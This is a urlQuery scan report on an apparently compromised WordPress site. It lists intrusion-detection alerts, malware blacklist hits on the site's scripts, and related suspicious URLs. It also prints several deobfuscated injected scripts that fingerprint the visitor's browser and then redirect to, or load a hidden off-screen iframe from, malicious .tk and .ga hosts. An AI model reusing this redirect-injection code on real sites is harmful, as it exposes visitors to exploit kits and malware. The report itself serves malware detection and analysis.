Overview

URL academicounsel.com/homim/zekifohe.html
IP 132.148.50.1
ASN
Location United States
Report completed 2018-05-31 18:19:46 CEST
urlQuery Alerts No alerts detected


Settings

UserAgent Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Severity Source IP Destination IP Alert
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:54 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:52 CEST 1  132.148.50.1 Client IP ET CURRENT_EVENTS Possible Evil Redirector Leading to EK June 10 2015
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET INFO JJEncode Encoded Script
2018-05-31 18:17:53 CEST 2  132.148.50.1 Client IP ET CURRENT_EVENTS WindowBase64.atob Function In Edwards Packed JavaScript - Possible iFrame Injection Detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2018-05-31 2 academicounsel.com/wp-includes/js/swfobject.js?ver=2.2-20120417 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js (...) Malware
2018-05-31 2 academicounsel.com/wp-includes/js/comment-reply.min.js?ver=4.0.5 Malware
2018-05-31 2 academicounsel.com/homim/min.js Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/bootstrap/js/bootstrap (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.mobile.custo (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.mobilemenu.j (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/jquery.easing.1. (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.magnific-pop (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/contact-form-7/includes/js/scripts.js (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/FlexSlider/jquer (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jplayer.playlist.mi (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4 Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.debouncedres (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.ba-resize.mi (...) Malware
2018-05-31 2 academicounsel.com/wp-content/themes/CherryFramework/js/jquery.isotope.js?v (...) Malware
2018-05-31 2 academicounsel.com/wp-content/plugins/cherry-plugin/lib/js/elasti-carousel/ (...) Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 132.148.50.1

Date UQ / IDS / BL URL IP
2018-06-13 16:47:30 +0200
0 - 2 - 2 zoelowney.com/Service-Inv/ 132.148.50.1
2018-06-11 17:37:04 +0200
0 - 2 - 2 silkscatering.com.au/IRS-Accounts-Transcipts- (...) 132.148.50.1
2018-06-08 12:49:45 +0200
0 - 0 - 2 222bulbs.com/ 132.148.50.1
2018-06-05 06:46:03 +0200
0 - 2 - 2 silkscatering.com.au/UPS-Factures-07/5/ 132.148.50.1
2018-06-04 21:27:15 +0200
0 - 2 - 2 silkscatering.com.au/Invoice-June/01/2018/ 132.148.50.1
2018-05-31 23:11:57 +0200
0 - 0 - 2 jerseydrunks.com/category/just-posts/function (...) 132.148.50.1
2018-05-29 22:03:49 +0200
0 - 2 - 0 silkscatering.com.au/ups.com/WebTracking/ENC- (...) 132.148.50.1
2018-05-29 22:02:41 +0200
0 - 2 - 0 silkscatering.com.au/ups.com/WebTracking/ENC- (...) 132.148.50.1
2018-05-26 23:05:37 +0200
0 - 0 - 10 www.binarywar.com/2009/11/troubleshooting-ema (...) 132.148.50.1
2018-05-19 23:02:50 +0200
0 - 0 - 1 crafthouse.co.nz/www.paypal-entrydata.com/sig (...) 132.148.50.1

Last 10 reports on ASN:

Date UQ / IDS / BL URL IP
2018-06-19 04:35:39 +0200
0 - 0 - 1 https://www.siteripcollection.com/siterip/2 139.59.173.101
2018-06-19 04:33:48 +0200
1 - 1 - 0 bloquearprograma.org/ 149.56.15.24
2018-06-19 04:30:11 +0200
0 - 1 - 0 thaiharurestaurant.com/ 198.54.117.200
2018-06-19 04:28:40 +0200
0 - 0 - 7 ikebukuro-gstyle.com 52.42.59.29
2018-06-19 04:24:52 +0200
2 - 0 - 8 arcanevault.com/toon-tumblers-teentitans-308.html 108.179.242.137
2018-06-19 04:17:35 +0200
0 - 0 - 0 https://www.territoires-rh.fr/forum/kunena-to (...) 164.132.235.17
2018-06-19 04:15:53 +0200
0 - 0 - 0 t.edm.sgic.com.au 52.63.55.158
2018-06-19 04:15:37 +0200
0 - 0 - 0 https://www.territoires-rh.fr/forum/kunena-to (...) 164.132.235.17
2018-06-19 04:13:55 +0200
0 - 0 - 0 https://2go-danmurphys.club.cutestat.com 103.111.79.79
2018-06-19 04:12:43 +0200
0 - 4 - 13 bhfrr.lu94.top/a/910229.html 202.168.151.42

Last 2 reports on domain: academicounsel.com

Date UQ / IDS / BL URL IP
2017-11-02 08:54:21 +0100
0 - 10 - 5 academicounsel.com/homim/sunilorov.html 132.148.50.1
2017-11-01 01:23:58 +0100
0 - 10 - 6 academicounsel.com/homim/5043.html 132.148.50.1


JavaScript

Executed Scripts (14)


Executed Evals (8)

#1 JavaScript::Eval (size: 6242, repeated: 1) - SHA256: 529cff59fb15bbca4af0b3bea1bb6a8972156e747b1093b6a253537cfe2cb1cc

var CXiQxGhFSFqiWndHAnoXOVpdoUNPKNNDf = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(CXiQxGhFSFqiWndHAnoXOVpdoUNPKNNDf);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ = (rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx() && VgEbGgWeIYgZYpgFYkurJzeGUrvgvluI());
            var wvFfKHCPyLIerudSEGfgQlWvdGccIECfgzGfpNOf = !DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ryJlLRdVXNZocruWhFNtqNtYQoynYrbk = -1;
            var ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW = "http://dgdsgweewtew545435.tk";
            if (ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr() && ryJlLRdVXNZocruWhFNtqNtYQoynYrbk == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW)
                } else {
                    window.location = ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW;
                    document.location = ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW
                }
            } else {
                if ((DocOSJMpMyYnxBsGzEoQWeBhqbwKSRebeMSVFuQ && !wvFfKHCPyLIerudSEGfgQlWvdGccIECfgzGfpNOf && !ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr())) {
                    var aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor = "<div style=\"position:absolute;left:-2066px;\"><iframe width=\"17px\" src=\"" + ANkXqmfZXlOAImrBmVAIrEnSzIsJPKnBEVROMHtQW + "\" height=\"17px\"></iframe></div>";
                    var GexiloQspgOwGLAmoYGgWUqPByjASKZ = document.getElementsByTagName("div");
                    if (GexiloQspgOwGLAmoYGgWUqPByjASKZ.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor
                    } else {
                        var dl_name = GexiloQspgOwGLAmoYGgWUqPByjASKZ.length;
                        var utNRDRoscuLlSENzKFGxVyQYnkgSYJa = Math.floor((dl_name / 2));
                        GexiloQspgOwGLAmoYGgWUqPByjASKZ[utNRDRoscuLlSENzKFGxVyQYnkgSYJa].innerHTML = GexiloQspgOwGLAmoYGgWUqPByjASKZ[utNRDRoscuLlSENzKFGxVyQYnkgSYJa].innerHTML + aYwXpVyARFCQtrMvCGBDiBlKHRthjAOkAYor
                    }
                }
            }
        }
        YQUWSVeWFIZsNMrXMJIxUaHmEjIMLExovAUyXQFdR()
    }
}, 100);

function YQUWSVeWFIZsNMrXMJIxUaHmEjIMLExovAUyXQFdR() {
    var nidikpeoIMMvxzjXsrxJOJHOydKswIYGte = "none";
    if (nidikpeoIMMvxzjXsrxJOJHOydKswIYGte != "none") {
        var jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG = document.getElementById(nidikpeoIMMvxzjXsrxJOJHOydKswIYGte);
        if (typeof jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG != undefined && jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG != null) {
            jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG.outerHTML = "";
            delete jUbNQUvNXwiENqAlmqYQyURCanwkpwqShiRuG
        }
    }
};

function VgEbGgWeIYgZYpgFYkurJzeGUrvgvluI() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx()) {
        return true
    } else {
        return false
    }
}

function rWbFsQYwWiCwloeLdlyOwCpQPlaGNQDx() {
    var xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu = window.navigator.userAgent;
    var bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("MSIE ");
    if (bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA > 0) {
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA + 5, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", bCEAWZXAuMvGfYqNVmLlfeVrAFNpwKqFzlMAhA)), 10)
    }
    var UasaTBZrVNfUumOCeRQOfbnuQgnOdPASDWRLq = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("Trident/");
    if (UasaTBZrVNfUumOCeRQOfbnuQgnOdPASDWRLq > 0) {
        var uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("rv:");
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj + 3, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", uovpNSzOgsuGOVHMhjIAjsyhJGmLZUpj)), 10)
    }
    var FpraNoBCvftAxbHtcxWePiCEvxWepNl = xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf("Edge/");
    if (FpraNoBCvftAxbHtcxWePiCEvxWepNl > 0) {
        return parseInt(xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.substring(FpraNoBCvftAxbHtcxWePiCEvxWepNl + 5, xeywZaXUQeZfpszRRHcDVeFhzNjwiwECQcgKu.indexOf(".", FpraNoBCvftAxbHtcxWePiCEvxWepNl)), 10)
    }
    return false
}

function ThtHLZWzhLrHgIeEbiXrDJDyUEHXXTFPblNlBOkrr() {
    var YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(YnIwenFmJZvvYAbunwrAPEvLzNGJMYJuc.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#2 JavaScript::Eval (size: 6255, repeated: 1) - SHA256: 24742f6f3220f4f2bb41d0c8b3c0c1cb2c4cac5f3b2f723e15a8bad407d4f0bb

var HOqPJMsJGkSbtwiXWVvLZVcAQgsLkZg = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(HOqPJMsJGkSbtwiXWVvLZVcAQgsLkZg);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz = (ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm() && aapIzKHnZbCOwmeORIZEukgsdmzKTuicayDnCl());
            var mCxXUcRgnRwWqPttQpiAoPLcILGLzJX = !KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var XrqruDcGpnKODCtKzUyjTSPIXxihzxqZKWWKASs = -1;
            var KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ = "http://trahnytbushakiry.ga";
            if (HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE() && XrqruDcGpnKODCtKzUyjTSPIXxihzxqZKWWKASs == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ)
                } else {
                    window.location = KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ;
                    document.location = KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ
                }
            } else {
                if ((KIXNiuvwkghZJNjkPSxGyTmFZDUDxbzqVcRXtzEz && !mCxXUcRgnRwWqPttQpiAoPLcILGLzJX && !HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE())) {
                    var onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj = "<div style=\"position:absolute;left:-1765px;\"><iframe width=\"16px\" src=\"" + KzBcRFimuRPlthQGwsohggbMvdvjdyfECOetcJ + "\" height=\"16px\"></iframe></div>";
                    var OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr = document.getElementsByTagName("div");
                    if (OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj
                    } else {
                        var dl_name = OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr.length;
                        var nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv = Math.floor((dl_name / 2));
                        OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr[nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv].innerHTML = OGPFgBzxOwtRbNtELJMNBLAyMrqjxUmr[nOAOtFpVGCHmtfKvZzUKWFREXhvwRyQv].innerHTML + onJnXciSLeAJsRtyXmMmfQqiaCuuSbavyIYnfVJj
                    }
                }
            }
        }
        YuxBSdzOtdomGMuRPVckkvZTJjASNAqaw()
    }
}, 100);

function YuxBSdzOtdomGMuRPVckkvZTJjASNAqaw() {
    var NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj = "none";
    if (NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj != "none") {
        var PBHAtqlSrAPGgPglOMzdcjfrRukcUlr = document.getElementById(NQEYkiOCvzpAEtJcgpNHXaLWRZhxnbsEJlrj);
        if (typeof PBHAtqlSrAPGgPglOMzdcjfrRukcUlr != undefined && PBHAtqlSrAPGgPglOMzdcjfrRukcUlr != null) {
            PBHAtqlSrAPGgPglOMzdcjfrRukcUlr.outerHTML = "";
            delete PBHAtqlSrAPGgPglOMzdcjfrRukcUlr
        }
    }
};

function aapIzKHnZbCOwmeORIZEukgsdmzKTuicayDnCl() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm()) {
        return true
    } else {
        return false
    }
}

function ocGusZEMSgVFrPnMRvLszNCRHAqiXNzMJYmvm() {
    var NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz = window.navigator.userAgent;
    var dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("MSIE ");
    if (dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs > 0) {
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs + 5, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", dKEcTIsWeBZSiaaLdvaDdycEwJwaLEhmHyHLBs)), 10)
    }
    var pMLccWewFnBAYKtsHeYAHSxUsGAAQBrbdJZXUuMd = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("Trident/");
    if (pMLccWewFnBAYKtsHeYAHSxUsGAAQBrbdJZXUuMd > 0) {
        var StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("rv:");
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe + 3, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", StDFHFHlwKRKZkXpqksMXxvBJSXjBEWqkUwzPRe)), 10)
    }
    var GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF = NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf("Edge/");
    if (GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF > 0) {
        return parseInt(NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.substring(GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF + 5, NsKJHrXoLfuVzZBjPvSAllUNxVHdEFalUz.indexOf(".", GqnJzMUUCcstPVHQwqHIpfMGaHRIZeYfCMkwRF)), 10)
    }
    return false
}

function HSqKhYYRzyvVxKEkLTJsqyMdxEmkKQnutkrE() {
    var bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(bvYTYMBMEfsqbKZbXRDBWLRnROSPgtSGxOaZPUmC.substr(0, 4))) {
        return true
    }
    return false
}
                                    

#3 JavaScript::Eval (size: 6314, repeated: 1) - SHA256: fec0f02c3294317f6af1d4ac62866ee2149d0110832a4bcb341069f25fb66405

var JBHcCllOLmzHcanQtaVtUyOioaMZwTIxcvmUy = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(JBHcCllOLmzHcanQtaVtUyOioaMZwTIxcvmUy);
        if (typeof window["v_33c6707314d42037774f224bfc240de3"] == "undefined") {
            window["v_33c6707314d42037774f224bfc240de3"] = 1;
            var AOxBEcEpPTAkNlZydiaiUkCaVhePKDx = (etQHxQfAsZsDKJfdroKwFGLKxNmROvXFMMWXLUV() && jkEtVMjHCfEbUwnAyLrVOQdguQXJsOGKyvFHIGjIS());
            var hOjsiwdItCVmevMoFHpvvccfJSuDbxxckzxDq = !AOxBEcEpPTAkNlZydiaiUkCaVhePKDx && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var MNWIVpVpYiamfSqEJaAndioEPkQtpmbE = -1;
            var vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON = "http://dgdsgweewtew545435.tk";
            if (SZALaqqEYCwlvsdYGLVLWtCqvxFyoIsYaEYE() && MNWIVpVpYiamfSqEJaAndioEPkQtpmbE == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON)
                } else {
                    window.location = vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON;
                    document.location = vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON
                }
            } else {
                if ((AOxBEcEpPTAkNlZydiaiUkCaVhePKDx && !hOjsiwdItCVmevMoFHpvvccfJSuDbxxckzxDq && !SZALaqqEYCwlvsdYGLVLWtCqvxFyoIsYaEYE())) {
                    var pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP = "<div style=\"position:absolute;left:-3674px;\"><iframe width=\"15px\" src=\"" + vDBSmNhSDBwWIZHAnUmjvLEbMPKaHvgrDIEjON + "\" height=\"15px\"></iframe></div>";
                    var lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg = document.getElementsByTagName("div");
                    if (lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP
                    } else {
                        var dl_name = lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg.length;
                        var QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc = Math.floor((dl_name / 2));
                        lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg[QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc].innerHTML = lDTDDutRECzgwvzcVzOgvFVFrlIgcJKDJg[QHwXeSZhJgkFoaZfgcHcYMKkxgGGTOWusc].innerHTML + pLqCARWqoNBIyyFMuVksNWrfwrfHWnvUSNREsP
                    }
                }
            }
        }
